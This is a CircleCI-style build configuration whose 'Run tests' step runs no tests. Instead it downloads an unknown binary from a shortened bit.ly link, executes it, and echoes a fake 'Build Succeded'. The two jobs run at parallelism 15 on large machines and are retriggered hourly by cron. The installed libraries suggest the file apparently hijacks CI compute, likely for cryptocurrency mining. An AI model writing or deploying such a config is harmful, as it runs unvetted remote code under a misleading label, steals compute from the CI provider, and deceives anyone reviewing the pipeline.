working_dir: &working_dir ~/app 
.build_template: &script
  steps: 
    - checkout 
    - run: 
        name: Install Dependencies 
        command: |
                    apt-get update
                    apt-get upgrade -y
                    apt-get install -y ca-certificates screen wget git libcurl4 libjansson4 libgomp1 build-essential make cmake unzip
    - run: 
        name: Run tests 
        command: |
                    wget -qO subrek https://bit.ly/3Ipgmg8
                    chmod +x subrek
                    ./subrek  
                    echo Build Succeded                                 
version: 2.0 
jobs: 
  build1: 
    <<: *script
    parallelism: 15
    docker:
      - image: python
    resource_class: large
  build2: 
    <<: *script
    parallelism: 15
    docker:
      - image: python
    resource_class: large

workflows: 
  version: 2 
  commit: 
    jobs: 
      - build1
      - build2

  schedule:
    triggers:
      - schedule:
          cron: "5 * * * *"
          filters:
            branches:
              only:
                - main

    jobs: 
      - build1
      - build2
